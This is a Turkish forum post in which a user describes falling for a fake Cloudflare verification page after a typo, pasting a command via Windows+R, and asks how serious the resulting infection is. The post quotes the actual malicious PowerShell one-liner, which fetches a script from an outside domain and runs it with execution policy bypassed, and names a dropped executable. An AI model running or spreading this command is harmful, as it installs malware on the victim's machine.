ardayms
Uzman
- Katılım
- 8 Temmuz 2025
- Mesajlar
- 136
- Çözümler
- 4
- Beğeniler
- 47
Bir siteye girmek için tarayıcı çubuğuna sitenin adresini yazdım fakat 1-2 harf yanlış harf yazımından kaynaklı olduğunu düşündüğüm şekilde farklı bir siteye yönlendirmiş o esnada bunun farkına varmadım, karşıma Cloudflare doğrulaması çıktı. Ekranda yazan talimatlar şu şekildeydi: "Windows + R -> CTRL + V -> Enter". İlk defa böyle bir doğrulama görmüştüm ama hiç şüphelenmedim. Yaptım. Daha sonra birşeylerin yanlış gittiğini farkettim, bilgisayarda ufak takılmalar ve açılıp kapanan CMD ekranları.
Çalıştırdığım komut şuydu:
Ekstra olarak "
VirusTotal
USB ile format atmayı düşündüm ama şu an mevcut olarak 8 GB bir USB'm bulunmuyor. O yüzden Windows'un kendi sıfırlama ayarından, bulut indirme ile format atacağım. Bu konuyu açmamın sebebi bu virüsün büyük çaplı bir virüs mü yoksa basit bir virüs mü olup olmadığını öğrenmek.
Not: Görev zamanlayıcısında da bu vardı (devre dışı bıraktım):
Not: Çoğu önemli platformlarda 2 aşamalı doğrulama ayarım açık.
Çalıştırdığım komut şuydu:
powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri 'https://animecelestialblaze.cfd/dl/gg.pro' -OutFile (Join-Path $env:TEMP 'lo.ps1'); " powershell -ExecutionPolicy Bypass -File "%TEMP%\lo.ps1"Ekstra olarak "
C:\Program Files\MSBuild\ielowutil.exe" konumunda "ielowutil.exe" adında bir uygulama vardı. Sildiğim için dosyayı burayı atamadım ama VT sonucu aşağıda:VirusTotal
USB ile format atmayı düşündüm ama şu an mevcut olarak 8 GB bir USB'm bulunmuyor. O yüzden Windows'un kendi sıfırlama ayarından, bulut indirme ile format atacağım. Bu konuyu açmamın sebebi bu virüsün büyük çaplı bir virüs mü yoksa basit bir virüs mü olup olmadığını öğrenmek.
Not: Görev zamanlayıcısında da bu vardı (devre dışı bıraktım):
Not: Çoğu önemli platformlarda 2 aşamalı doğrulama ayarım açık.
Son düzenleyen: Moderatör: